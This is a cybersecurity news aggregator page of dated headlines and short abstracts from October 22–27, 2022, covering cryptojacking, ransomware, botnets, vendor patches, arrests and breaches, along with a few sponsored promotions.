New Cryptojacking Campaign Targeting Vulnerable Docker and Kubernetes Instances Full Text
Abstract
A new cryptojacking campaign has been uncovered targeting vulnerable Docker and Kubernetes infrastructures as part of opportunistic attacks designed to illicitly mine cryptocurrency. Cybersecurity company CrowdStrike dubbed the activity Kiss-a-dog , with its command-and-control infrastructure overlapping with those associated with other groups like TeamTNT , which are known to strike misconfigured Docker and Kubernetes instances. The intrusions, spotted in September 2022, get their name from a domain named "kiss.a-dog[.]top" that's used to trigger a shell script payload on the compromised container using a Base64-encoded Python command. "The URL used in the payload is obscured with backslashes to defeat automated decoding and regex matching to retrieve the malicious domain," CrowdStrike researcher Manoj Ahuje said in a technical analysis. The attack chain subsequently attempts to escape the container and move laterally into the breached network, whThe Hacker News
October 27, 2022 – Denial Of Service
Fodcha DDoS botnet reaches 1Tbps in power, injects ransoms in packets Full Text
Abstract
A new version of the Fodcha DDoS botnet has emerged, featuring ransom demands embedded in packets and new features to evade detection of its infrastructure.BleepingComputer
October 26, 2022 – Hacker
Notorious ‘BestBuy’ hacker arraigned for running dark web market Full Text
Abstract
A notorious British hacker was arraigned on Wednesday by the U.S. Department of Justice for allegedly running the now defunct 'The Real Deal" dark web marketplace.BleepingComputer
October 26, 2022 – Business
Spyderbat Raises $10M in Series A Funding Full Text
Abstract
The Austin, TX-based cloud-native runtime security company, raised $10M in Series A funding. The round was led by NTTVC with participation from LiveOak Venture Partners, Benhamou Global Ventures, and John McHale.FinSMEs
October 26, 2022 – Policy and Law
U.S. Charges Ukrainian Hacker Over Role in Raccoon Stealer Malware Service Full Text
Abstract
A 26-year-old Ukrainian national has been charged in the U.S. for his alleged role in the Raccoon Stealer malware-as-a-service (MaaS) operation. Mark Sokolovsky, who was arrested by Dutch law enforcement after leaving Ukraine on March 4, 2022, in what's said to be a Porsche Cayenne, is currently being held in the Netherlands and awaits extradition to the U.S. "Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency," the U.S. Department of Justice (DoJ) said . "These individuals used various ruses, such as email phishing, to install the malware onto the computers of unsuspecting victims." Sokolovsky is said to have gone by various online monikers like Photix, raccoonstealer, and black21jack77777 on online cybercrime forums to advertise the service for sale. Raccoon Stealer, mainly distributed under the guise of cracked software, is known to be one oThe Hacker News
October 26, 2022 – Vulnerabilities
OpenSSL to fix the second critical flaw ever Full Text
Abstract
The OpenSSL Project announced an upcoming update to address a critical vulnerability in the open-source toolkit. The OpenSSL Project announced that it is going to release updates to address a critical vulnerability in the open-source toolkit. Experts...Security Affairs
October 26, 2022 – Solution
LinkedIn’s new security features combat fake profiles, threat actors Full Text
Abstract
LinkedIn has introduced three new features to fight fake profiles and malicious use of the platform, including a new method to confirm whether a profile is authentic by showing whether it has a verified work email or phone number.BleepingComputer
October 26, 2022 – Business
Valence Security raises fresh capital to secure the SaaS app supply chain Full Text
Abstract
The $25 million Series A round was led by M12, Microsoft’s corporate venture arm, with participation from YL Ventures, Porsche Ventures, Akamai Technologies, Alumni Ventures, and former Symantec CEO Michael Fey.Tech Crunch
October 26, 2022 – Education
This 9-Course Bundle Can Take Your Cybersecurity Skills to the Next Level Full Text
Abstract
If you regularly read The Hacker News, there's a fair chance that you know something about cybersecurity . It's possible to turn that interest into a six-figure career. But to make the leap, you need to pick up some key skills and professional certifications. Featuring nine in-depth courses, The 2022 Masters in Cyber Security Certification Bundle helps you get ready for the next step. And in a special reader offer, you can get lifetime access for only $39.99. Special Offer — This bundle contains nine courses with a total value of $1,800. But for a limited time, you can get lifetime on-demand access for only $39.99 . That is a massive 97% off MSRP! From penetration testing to threat analysis , there are thousands of vacant roles in the cybersecurity industry right now. What's more, this trend is set to continue, with experts predicting a 12% growth within the industry in the remainder of this decade. The really exciting part is that anyone can land a highly paid job withinThe Hacker News
October 26, 2022 – Breach
See Tickets discloses data breach, customers’ credit card data exposed Full Text
Abstract
International ticketing services company See Tickets disclosed a data breach that exposed customers' payment card details. Ticketing service company See Tickets disclosed a data breach, and threat actors might have accessed customers' payment card...Security Affairs
October 26, 2022 – Education
Outpost24: How Pentesting-as-a-Service finds vulnerabilities before they’re exploited Full Text
Abstract
Organizations need to continuously monitor their entire surface infrastructure to adequately reduce application risk. This is where Outpost24's Pentesting-as-a-Service (PTaaS) software comes in.BleepingComputer
October 26, 2022 – Vulnerabilities
Google Patches 14 Vulnerabilities with the Release of Chrome 107 Full Text
Abstract
Google this week announced the release of Chrome 107 to the stable channel, with patches for 14 vulnerabilities, including high-severity bugs reported by external researchers.Security Week
October 26, 2022 – Hacker
Kimsuky Hackers Spotted Using 3 New Android Malware to Target South Koreans Full Text
Abstract
The North Korean espionage-focused actor known as Kimsuky has been observed using three different Android malware strains to target users located in its southern counterpart. That's according to findings from South Korean cybersecurity company S2W, which named the malware families FastFire, FastViewer, and FastSpy. "The FastFire malware is disguised as a Google security plugin, and the FastViewer malware disguises itself as 'Hancom Office Viewer,' [while] FastSpy is a remote access tool based on AndroSpy ," researchers Lee Sebin and Shin Yeongjae said . Kimsuky, also known by the names Black Banshee, Thallium, and Velvet Chollima, is believed to be tasked by the North Korean regime with a global intelligence-gathering mission, disproportionately targeting individuals and organizations in South Korea, Japan, and the U.S. This past August, Kaspersky unearthed a previously undocumented infection chain dubbed GoldDragon to deploy a Windows backdoor capable oThe Hacker News
October 26, 2022 – Policy and Law
US charges Ukrainian man with Raccoon Infostealer operation Full Text
Abstract
US authorities charged a Ukrainian man with computer fraud for allegedly infecting millions of computers with Raccoon Infostealer. The US Justice Department charged a Ukrainian, Mark Sokolovsky (26) man with computer fraud for allegedly infecting...Security Affairs
October 26, 2022 – Breach
Medibank now says hackers accessed all its customers’ personal data Full Text
Abstract
Australian insurance firm Medibank has confirmed that hackers accessed all of its customers' personal data and a large amount of health claims data during a recent ransomware attack.BleepingComputer
October 26, 2022 – Government
CISA Seeks Feedback on Baseline Measures to Secure Cloud Configuration Full Text
Abstract
The CISA is inviting public comment—particularly from agencies—on what it’s proposing as the bare minimum set of actions organizations should take to control access to their assets in cloud environments, and how to implement them.Nextgov
October 26, 2022 – Hacker
Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military Full Text
Abstract
The threat actor behind a remote access trojan called RomCom RAT has been observed targeting Ukrainian military institutions as part of a new spear-phishing campaign that commenced on October 21, 2022. The development marks a shift in the attacker's modus operandi, which has been previously attributed to spoofing legitimate apps like Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems. "The initial 'Advanced IP Scanner' campaign occurred on July 23, 2022," the BlackBerry research and intelligence team said . "Once the victim installs a Trojanized bundle, it drops RomCom RAT to the system." While previous iterations of the campaign involved the use of trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on part of the adversary to refine tactics and thwart detection. These lookalike websites host a rogue installer package that rThe Hacker News
October 26, 2022 – Vulnerabilities
Two flaws in Cisco AnyConnect Secure Mobility client for Windows actively exploited Full Text
Abstract
Cisco warns of active exploitation attempts targeting two vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows. Cisco is warning of exploitation attempts targeting two security flaws, tracked as CVE-2020-3153 (CVSS score: 6.5)...Security Affairs
October 26, 2022 – Vulnerabilities
Microsoft fixes Windows vulnerable driver blocklist sync issue Full Text
Abstract
Microsoft says it addressed an issue preventing the Windows kernel vulnerable driver blocklist from being synced to systems running older Windows versions.BleepingComputer
October 26, 2022 – Vulnerabilities
OpenSSL to Patch First Critical Vulnerability Since 2016 Full Text
Abstract
OpenSSL version 3.0.7 is scheduled for Tuesday, November 1, between 13:00 and 17:00 UTC. No details have been provided, but it has been described as a ‘security-fix release’ that will include a patch for a vulnerability rated ‘critical’.Security Week
October 26, 2022 – Hacker
Vice Society Hackers Are Behind Several Ransomware Attacks Against Education Sector Full Text
Abstract
A cybercrime group known as Vice Society has been linked to multiple ransomware strains in its malicious campaigns aimed at the education, government, and retail sectors. The Microsoft Security Threat Intelligence team, which is tracking the threat cluster under the moniker DEV-0832, said the group avoids deploying ransomware in some cases and rather likely carries out extortion using exfiltrated stolen data. "Shifting ransomware payloads over time from BlackCat , Quantum Locker , and Zeppelin , DEV-0832's latest payload is a Zeppelin variant that includes Vice Society-specific file extensions, such as .v-s0ciety, .v-society, and, most recently, .locked," the tech giant's cybersecurity division said . Vice Society, active since June 2021, has been steadily observed encrypting and exfiltrating victim data, and threatening companies with exposure of siphoned information to pressure them into paying a ransom. "Unlike other RaaS (Ransomware-as-a-Service)The Hacker News
October 26, 2022 – Vulnerabilities
VMware fixes critical RCE in VMware Cloud Foundation Full Text
Abstract
VMware addressed a critical remote code execution vulnerability in VMware Cloud Foundation tracked as CVE-2021-39144. VMware has released security updates to address a critical vulnerability, tracked as CVE-2021-39144 (CVSSv3 9.8), in VMware Cloud...Security Affairs
October 26, 2022 – Vulnerabilities
Apple Patches Over 100 Vulnerabilities With Release of macOS Ventura 13 Full Text
Abstract
A total of 112 CVE identifiers are listed in Apple’s security advisory for macOS Ventura 13, including issues that are specific to the operating system and flaws impacting third-party components.Security Week
October 26, 2022 – Vulnerabilities
Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities Full Text
Abstract
Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows. Tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), the vulnerabilities could enable local authenticated attackers to perform DLL hijacking and copy arbitrary files to system directories with elevated privileges. While CVE-2020-3153 was addressed by Cisco in February 2020, a fix for CVE-2020-3433 was shipped in August 2020. "In October 2022, the Cisco Product Security Incident Response Team became aware of additional attempted exploitation of this vulnerability in the wild," the networking equipment maker said in an updated advisory. "Cisco continues to strongly recommend that customers upgrade to a fixed software release to remediate this vulnerability." The alert comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) moved to add the two flaws to its KThe Hacker News
October 26, 2022 – Vulnerabilities
VMware Releases Patch for Critical RCE Flaw in Cloud Foundation Platform Full Text
Abstract
VMware on Tuesday shipped security updates to address a critical security flaw in its VMware Cloud Foundation product. Tracked as CVE-2021-39144, the issue has been rated 9.8 out of 10 on the CVSS vulnerability scoring system, and relates to a remote code execution vulnerability via XStream open source library. "Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance," the company said in an advisory. In light of the severity of the flaw and its relatively low bar for exploitation, the Palo Alto-based virtualization services provider has also made available a patch for end-of-life products. Also addressed by VMware as part of the update is CVE-2022-31678 (CVSS score: 5.3), an XML External Entity ( XXE ) vulnerability that could be exploited to result in a denial-of-service (DoS) condition or unauthorized infoThe Hacker News
October 25, 2022 – Vulnerabilities
Cisco warns admins to patch AnyConnect flaw exploited in attacks Full Text
Abstract
Cisco warned customers today that two security vulnerabilities in the Cisco AnyConnect Secure Mobility Client for Windows are being exploited in the wild.BleepingComputer
October 25, 2022 – APT
SideWinder APT Uses New WarHawk Backdoor Against Pakistan Full Text
Abstract
Nation-state actor SideWinder compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk. Multiple malicious modules in WarHawk deliver Cobalt Strike, including new TTPs such as KernelCallBackTable injection and checking ... Read MoreCyware Alerts - Hacker News
October 25, 2022 – Vulnerabilities
Experts disclosed a 22-year-old bug in popular SQLite Database library Full Text
Abstract
A high-severity vulnerability, tracked as CVE-2022-35737, has been disclosed in the SQLite database library. The security expert Andreas Kellas detailed a high-severity vulnerability, tracked as CVE-2022-35737 (CVSS score: 7.5), in the SQLite database...Security Affairs
October 25, 2022 – Breach
See Tickets discloses 2.5 years-long credit card theft breach Full Text
Abstract
Ticketing service provider 'See Tickets' has disclosed a data breach, informing customers that cybercriminals might have accessed their payment card details via a skimmer on its website.BleepingComputer
October 25, 2022 – Malware
BlackByte Adds Exbyte Exfiltration Tool to Strengthen Extortion Game Full Text
Abstract
BlackByte ransomware operators have started deploying a new exfiltration tool, named Exbyte, to speed up data theft and upload it to an external server. Exbyte is a Go-based exfiltration tool that uploads stolen files directly to the Mega cloud storage service. With new custom tools, distribut ... Read MoreCyware Alerts - Hacker News
October 25, 2022 – Vulnerabilities
22-Year-Old Vulnerability Reported in Widely Used SQLite Database Library Full Text
Abstract
A high-severity vulnerability has been disclosed in the SQLite database library, which was introduced as part of a code change dating all the way back to October 2000 and could enable attackers to crash or control programs. Tracked as CVE-2022-35737 (CVSS score: 7.5), the 22-year-old issue affects SQLite versions 1.0.12 through 3.39.1, and has been addressed in version 3.39.2 released on July 21, 2022. "CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled," Trail of Bits researcher Andreas Kellas said in a technical write-up published today. "Arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases." Programmed in C, SQLite is the most widely used database engine , included by default in Android, iOS, Windows, and macOS, as well as popular web browsers such as GooglThe Hacker News
October 25, 2022 – Malware
Two PoS Malware used to steal data from more than 167,000 credit cards Full Text
Abstract
Researchers reported that threat actors used 2 PoS malware variants to steal information about more than 167,000 credit cards. Cybersecurity firm Group-IB discovered two PoS malware to steal data associated with more than 167,000 credit cards from...Security Affairs
October 25, 2022 – Malware
Ukrainian charged for operating Raccoon Stealer malware service Full Text
Abstract
26-year-old Ukrainian national Mark Sokolovsky has been charged for his involvement in the Raccoon Stealer malware-as-a-service (MaaS) cybercrime operation.BleepingComputer
October 25, 2022 – Attack
Emotet Launches Attacks with One-Click Attack Technique Full Text
Abstract
Trustwave SpiderLabs noted a spike in malspam campaigns by the Emotet botnet. In this attack wave, attackers are reportedly using invoice-themes phishing lures with password-protected archive files. These files drop CoinMiner and Quasar RAT to take over compromised systems.Cyware Alerts - Hacker News
October 25, 2022 – Breach
Hive Ransomware Hackers Begin Leaking Data Stolen from Tata Power Energy Company Full Text
Abstract
The Hive ransomware-as-a-service (RaaS) group has claimed responsibility for a cyber attack against Tata Power that was disclosed by the company less than two weeks ago. The incident is said to have occurred on October 3, 2022. The threat actor has also been observed leaking stolen data exfiltrated prior to encrypting the network as part of its double extortion scheme. This allegedly comprises signed client contracts, agreement documents, as well as other sensitive information such as emails, addresses, phone numbers, passport numbers, taxpayer data, among others. The Mumbai-based firm, which is India's largest integrated power company, is part of the Tata Group conglomerate. Tata Power had previously disclosed in a filing with the National Stock Exchange (NSE) of India that an intrusion on the company's IT infrastructure impacted "some of its IT systems." According to further details shared by security researcher Rakesh Krishnan, the leak contains personThe Hacker News
October 25, 2022 – Criminals
Hive ransomware gang starts leaking data allegedly stolen from Tata Power Full Text
Abstract
The Hive ransomware gang, which claimed the responsibility for the Tata Power data breach, started leaking data. On October 14, Tata Power, India’s largest power generation company, announced that was hit by a cyber attack. Threat actors hit the Information...Security Affairs
October 25, 2022 – Ransomware
Microsoft: Vice Society targets schools with multiple ransomware families Full Text
Abstract
A threat group known as Vice Society has been switching ransomware payloads in attacks targeting the education sector across the United States and worldwide.BleepingComputer
October 25, 2022 – Botnet
Emotet Botnet Drops Malware via Self-Unlocking Password-Protected RAR Files Full Text
Abstract
In an attack chain detected by Trustwave SpiderLabs researchers, an invoice-themed ZIP file lure was found to contain a nested self-extracting (SFX) archive, with the first archive having the purpose to launch the second.Heimdal Security
October 25, 2022 – Vulnerabilities
Researchers Detail Windows Event Log Vulnerabilities: LogCrusher and OverLog Full Text
Abstract
Cybersecurity researchers have disclosed details about a pair of vulnerabilities in Microsoft Windows, one of which could be exploited to result in a denial-of-service (DoS). The exploits, dubbed LogCrusher and OverLog by Varonis, take aim at the EventLog Remoting Protocol ( MS-EVEN ), which enables remote access to event logs. While the former allows "any domain user to remotely crash the Event Log application of any Windows machine," OverLog causes a DoS by "filling the hard drive space of any Windows machine on the domain," Dolev Taler said in a report shared with The Hacker News. OverLog has been assigned the CVE identifier CVE-2022-37981 (CVSS score: 4.3) and was addressed by Microsoft as part of its October Patch Tuesday updates. LogCrusher, however, remains unresolved. "The performance can be interrupted and/or reduced, but the attacker cannot fully deny service," the tech giant said in an advisory for the flaw released earlier this mThe Hacker News
October 25, 2022 – Malware
Dormant Colors campaign operates over 1M malicious Chrome extensions Full Text
Abstract
A new malvertising campaign, code-named Dormant Colors, is delivering malicious Google Chrome extensions that hijack targets’ browsers. Researchers at Guardio Labs have discovered a new malvertising campaign, called Dormant Colors, aimed at delivering...Security Affairs
October 25, 2022 – Criminals
Dutch police arrest hacker who breached healthcare software vendor Full Text
Abstract
The Dutch police have arrested a 19-year-old man in western Netherlands, suspected of breaching the systems of a healthcare software vendor in the country, and stealing tens of thousands of documents.BleepingComputer
October 25, 2022 – Criminals
Crooks Use Two Different POS Malware to Steal 167,000 Credit Card Numbers Full Text
Abstract
The MajikPOS and Treasure Hunter malware infect Windows POS terminals and scan the devices to exploit the moments when card data is read and stored in plain text in memory.The Register
October 25, 2022 – Education
How the Software Supply Chain Security is Threatened by Hackers Full Text
Abstract
Introduction In many ways, the software supply chain is similar to that of manufactured goods, which we all know has been largely impacted by a global pandemic and shortages of raw materials. However, in the IT world, it is not shortages or pandemics that have been the main obstacles to overcome in recent years, but rather attacks aimed at using them to harm hundreds or even thousands of victims simultaneously. If you've heard of a cyber attack between 2020 and today, it's likely that the software supply chain played a role. When we talk about an attack on the software supply chain, we are actually referring to two successive attacks: one that targets a supplier, and one that targets one or more downstream users in the chain, using the first as a vehicle. In this article, we will dive into the mechanisms and risks of the software supply chain by looking at a typical vulnerability of the modern development cycle: the presence of personal identifying information, or "The Hacker News
October 25, 2022 – Vulnerabilities
VMware fixes critical Cloud Foundation remote code execution bug Full Text
Abstract
VMware has released security updates today to fix a critical vulnerability in VMware Cloud Foundation, a hybrid cloud platform for running enterprise apps in private or public environments.BleepingComputer
October 25, 2022 – Government
CISA Warns of Attacks Exploiting Cisco, Gigabyte Vulnerabilities Full Text
Abstract
The Cisco product vulnerabilities both impact the AnyConnect Secure Mobility Client for Windows. They can be exploited by a local, authenticated attacker to execute arbitrary code and copy files to arbitrary locations with elevated privileges.Security Week
October 25, 2022 – Criminals
Cybercriminals Used Two PoS Malware to Steal Details of Over 167,000 Credit Cards Full Text
Abstract
Two point-of-sale (PoS) malware variants have been put to use by a threat actor to steal information related to more than 167,000 credit cards from payment terminals. According to Singapore-headquartered cybersecurity company Group-IB, the stolen data dumps could net the operators as much as $3.34 million by selling them on underground forums. While a significant proportion of attacks aimed at gathering payment data rely on JavaScript sniffers (aka web skimmers) stealthily inserted on e-commerce websites, PoS malware continues to be an ongoing, if less popular, threat. Just last month, Kaspersky detailed new tactics adopted by a Brazilian threat actor known as Prilex to steal money by means of fraudulent transactions. "Almost all PoS malware strains have a similar card dump extraction functionality, but different methods for maintaining persistence on infected devices, data exfiltration and processing," researchers Nikolay Shelekhov and Said Khamchiev said . TreaThe Hacker News
October 25, 2022 – Cryptocurrency
Massive cryptomining campaign abuses free-tier cloud dev resources Full Text
Abstract
An automated and large-scale 'freejacking' campaign abuses free GitHub, Heroku, and Buddy services to mine cryptocurrency at the provider's expense.BleepingComputer
October 25, 2022 – Attack
Hackers hit cybersecurity conference in Australia Full Text
Abstract
The Australian Institute of Company Directors (AIDC) had some solid names lending support to the launch of the institute’s new set of “cybersecurity governance principles” but the event did not start on time due to the hacking incident.Sydney Morning Herald
October 25, 2022 – Vulnerabilities
Apple Releases Patch for New Actively Exploited iOS and iPadOS Zero-Day Vulnerability Full Text
Abstract
Tech giant Apple on Monday rolled out updates to remediate a zero-day flaw in iOS and iPadOS that it said has been actively exploited in the wild. The weakness, given the identifier CVE-2022-42827 , has been described as an out-of-bounds write issue in the Kernel, which could be abused by a rogue application to execute arbitrary code with the highest privileges. Successful exploitation of out-of-bounds write flaws, which typically occur when a program attempts to write data to a memory location that's outside of the bounds of what it is allowed to access, can result in corruption of data, a crash, or execution of unauthorized code. The iPhone maker said it addressed the bug with improved bounds checking, while crediting an anonymous researcher for reporting the vulnerability. As is usually the case with actively exploited zero-day flaws, Apple refrained from sharing more specifics about the shortcoming other than acknowledging that it's "aware of a report that this iThe Hacker News
October 25, 2022 – Solution
New Samsung Maintenance Mode protects your data during phone repairs Full Text
Abstract
After a successful pilot program in Korea, Samsung is now rolling out 'Maintenance Mode' to select Galaxy devices globally, to help users protect their sensitive data when they hand over their smartphones at service points.BleepingComputer
October 25, 2022 – Vulnerabilities
Jira Align Vulnerabilities Exposed Atlassian Infrastructure to Attacks Full Text
Abstract
Vulnerabilities addressed recently in Jira Align could allow an attacker to elevate privileges, obtain Atlassian cloud credentials, and potentially go after Atlassian infrastructure, researchers with Bishop Fox warn.Security Week
October 25, 2022 – Education
How the “pizza123” password could take down an organization Full Text
Abstract
The breach, the bitter taste of pizza123, and the plight of malicious push notifications demand caution when selecting and managing passwords.BleepingComputer
October 25, 2022 – Breach
Hive claims ransomware attack on Tata Power, begins leaking data Full Text
Abstract
Hive ransomware group has claimed responsibility for a cyber attack disclosed by Tata Power this month. In screenshots seen by BleepingComputer, Hive operators are leaking data they claim to have stolen from Tata Power, indicating the ransom negotiations failed.BleepingComputer
October 24, 2022 – Malware
Chrome extensions with 1 million installs hijack targets’ browsers Full Text
Abstract
Researchers at Guardio Labs have discovered a new malvertizing campaign pushing Google Chrome and Microsoft Edge extensions that hijack searches and insert affiliate links into webpages.BleepingComputer
October 24, 2022 – Breach
Hacktivists ‘Steal’ 100,000 Emails from Iran Nuclear Agency Full Text
Abstract
An activist group that calls itself Black Reward and claims to be from Iran claimed that it had accessed an email server run by a company related to Iran's Atomic Energy Organization and exfiltrated 324 inboxes comprising over 100,000 messages.The Register
October 24, 2022 – Education
Download eBook: Top virtual CISOs share 7 tips for vCISO service providers Full Text
Abstract
Virtual Chief Information Security Officer (vCISO) services (also known as 'Fractional CISO' or 'CISO-as-a-Service') are growing in popularity, especially as growing cyber threats, tightening regulatory demands and strict cyber insurance requirements are driving small to medium-sized enterprises demand for strategic cybersecurity and compliance guidance and management. But vCISO services are labor intensive, require highly skilled experts, and are difficult to scale. So, how exactly do successful vCISO providers overcome these obstacles? When you want advice on how to overcome challenges, scale and expand, who better to go to than the people who have been there, seen it, and done it with success? In a new eBook, titled ' Top virtual CISOs share: 7 tips on how vCISO service providers can maximize services, increase revenues, and improve margins " ( Download here ), vCISO platform provider Cynomi interviewed some of America's top vCISO service providers (MSThe Hacker News
October 24, 2022 – Vulnerabilities
Apple fixed the ninth actively exploited zero-day this year Full Text
Abstract
Apple released security updates that addressed the ninth zero-day vulnerability actively exploited in the wild since the start of the year. Apple has addressed the ninth zero-day vulnerability exploited in attacks in the wild since the start of the year. The...Security Affairs
October 24, 2022 – Vulnerabilities
Apple fixes new zero-day used in attacks against iPhones, iPads Full Text
Abstract
In security updates released on Monday, Apple has fixed the ninth zero-day vulnerability used in attacks against iPhones since the start of the year.BleepingComputer
October 24, 2022 – Malware
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
A team of researchers at the Leiden Institute of Advanced Computer Science discovered thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for multiple vulnerabilities.Security Affairs
October 24, 2022 – APT
SideWinder APT Using New WarHawk Backdoor to Target Entities in Pakistan Full Text
Abstract
SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk . "The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection and Pakistan Standard Time zone check in order to ensure a victorious campaign," Zscaler ThreatLabz said . The threat group, also called APT-C-17, Rattlesnake, and Razor Tiger, is suspected to be an Indian state-sponsored group, although a report from Kaspersky earlier this May acknowledged previous indicators that led to the attribution have since disappeared, making it challenging it to link the threat cluster to a specific nation. More than 1,000 attacks are said to have been launched by the group since April 2020, an indication of SideWinder's newfound aggressionThe Hacker News
October 24, 2022 – Government
Cuba ransomware affiliate targets Ukraine, CERT-UA warns Full Text
Abstract
The Ukraine Computer Emergency Response Team (CERT-UA) warns of Cuba Ransomware attacks against critical networks in the country. The Ukraine Computer Emergency Response Team (CERT-UA) warns of potential Cuba Ransomware attacks against local critical...Security Affairs
October 24, 2022 – Breach
Iran’s atomic energy agency confirms hack after stolen data leaked online Full Text
Abstract
The Iranian Atomic Energy Organization (AEOI) has confirmed that one of its subsidiaries' email servers was hacked after the ''Black Reward' hacking group published stolen data online.BleepingComputer
October 24, 2022 – Government
FBI Warns of Iranian Cyber Firm’s Hack-and-Leak Operations Full Text
Abstract
Previously known as Eeleyanet Gostar and Net Peygard Samavat, Emennet Pasargad is an organization that often changes its name to avoid US sanctions, and which is known for providing cybersecurity services to government entities in Iran.Security Week
October 24, 2022 – Government
CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware Full Text
Abstract
U.S. cybersecurity and intelligence agencies have published a joint advisory warning of attacks perpetrated by a cybercrime gang known as the Daixin Team primarily targeting the healthcare sector in the country. "The Daixin Team is a ransomware and data extortion group that has targeted the HPH Sector with ransomware and data extortion operations since at least June 2022," the agencies said . The alert was published Friday by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS). Over the past four months, the group has been linked to multiple ransomware incidents in the Healthcare and Public Health (HPH) sector, encrypting servers related to electronic health records, diagnostics, imaging, and intranet services. It's also said to have exfiltrated personal identifiable information (PII) and patient health information (PHI) as part of a double extortion scheme to seThe Hacker News
October 24, 2022 – Government
Norway PM warns of Russia cyber threat to oil and gas industry Full Text
Abstract
Norway ’s prime minister warned last week that Russia poses “a real and serious threat” to the country’s oil and gas industry. Norway ’s prime minister Jonas Gahr Støre warned that Russia poses “a real and serious threat” to the country’s...Security Affairs
October 24, 2022 – Ransomware
Cuba ransomware affiliate targets Ukrainian govt agencies Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about potential Cuba Ransomware attacks against critical networks in the country.BleepingComputer
October 24, 2022 – Breach
Data of alleged 2.6m Carousell accounts being sold on Dark Web, hacking forums Full Text
Abstract
The breached database, allegedly containing the information of 2.6 million accounts, is being sold for $1,000. Carousell said that 1.95 million user accounts were affected.Straits Times
October 24, 2022 – General
Why Ransomware in Education on the Rise and What That Means for 2023 Full Text
Abstract
The breach of LA Unified School District (LAUSD) highlights the prevalence of password vulnerabilities, as criminal hackers continue to use breached credentials in increasingly frequent ransomware attacks on education. The Labor Day weekend breach of LAUSD brought significant districtwide disruptions to access to email , computers, and applications. It's unclear what student or employee data the attackers exfiltrated. There is a significant trend in ransomware breaches in education, a highly vulnerable sector. The transitory nature of students leaves accounts and passwords vulnerable. The open environments schools create to foster student exploration and the relative naivete in the sector regarding cybersecurity invite attacks. The breach at LAUSD and what happened afterward Four days post-breach, reports came that criminals had offered credentials for accounts inside the school district's network for sale on the dark web months before the attack. The stolen credentialThe Hacker News
October 24, 2022 – Malware
Malicious Clicker apps in Google Play have 20M+ installs Full Text
Abstract
Researchers discovered 16 malicious clicker apps in the official Google Play store that were downloaded by 20M+ users. Security researchers at McAfee have discovered 16 malicious clicker apps available in the official Google Play store that were installed...Security Affairs
October 24, 2022 – Attack
Pendragon car dealer refuses $60 million LockBit ransomware demand Full Text
Abstract
Pendragon Group, with more than 200 car dealerships in the U.K., was breached in a cyberattack from the LockBit ransomware gang, who allegedly demanded $60 million to decrypt files and not leak them.BleepingComputer
October 24, 2022 – Malware
Security experts targeted with malicious CVE PoC exploits on GitHub Full Text
Abstract
Researchers discovered thousands of GitHub repositories that offer fake proof-of-concept (PoC) exploits for various flaws used to distribute malware. A team of researchers at the Leiden Institute of Advanced Computer Science (Soufian El Yadmani, Robin...Security Affairs
October 23, 2022 – Phishing
Thousands of GitHub repositories deliver fake PoC exploits with malware Full Text
Abstract
Researchers at the Leiden Institute of Advanced Computer Science found thousands of repositories on GitHub that offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware.BleepingComputer
October 23, 2022 – General
Security Affairs newsletter Round 390 Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Daixin...Security Affairs
October 23, 2022 – Phishing
Typosquat campaign mimics 27 brands to push Windows, Android malware Full Text
Abstract
A massive, malicious campaign is underway using over 200 typosquatting domains that impersonate twenty-seven brands to trick visitors into downloading various Windows and Android malware.BleepingComputer
October 23, 2022 – Breach
Hackers stole sensitive data from Iran’s atomic energy agency Full Text
Abstract
Iran’s atomic energy agency claims that alleged state-sponsored hackers have compromised its email system. Iran’s atomic energy agency revealed on Sunday that a nation-state actor had access to a subsidiary’s network and free access to its email...Security Affairs
October 23, 2022 – Attack
Wholesale giant METRO confirmed to have suffered a cyberattack Full Text
Abstract
International cash and carry giant METRO suffered this week IT infrastructure outages following a cyberattack. International cash and carry giant METRO was hit by a cyberattack that caused IT infrastructure outages. Metro employs more than 95,000...Security Affairs
October 22, 2022 – Ransomware
LockBit Ransomware - The Most Active Global Threat Full Text
Abstract
LockBit, a RaaS, ranks among the top in the ransomware threat category as it has been causing significant damage through its attack campaigns. Lockbit 3.0 is its latest variant. LockBit has hit 1,157 victims on record (throughout its lifetime), which is way ahead of Conti (900), Hive (192), and Bla ... Read MoreCyware Alerts - Hacker News
October 22, 2022 – Criminals
Remote Control Tools Popular Among Cybercriminals Full Text
Abstract
While remote access tools offer a flexible support to organizations, these tools are increasingly exploited by cybercriminals to harass target organizations. Remote shell is the most common remote access tool, then comes RATs, Cobalt Strike, and others.Cyware Alerts - Hacker News
October 22, 2022 – Malware
Android adware apps in Google Play downloaded over 20 million times Full Text
Abstract
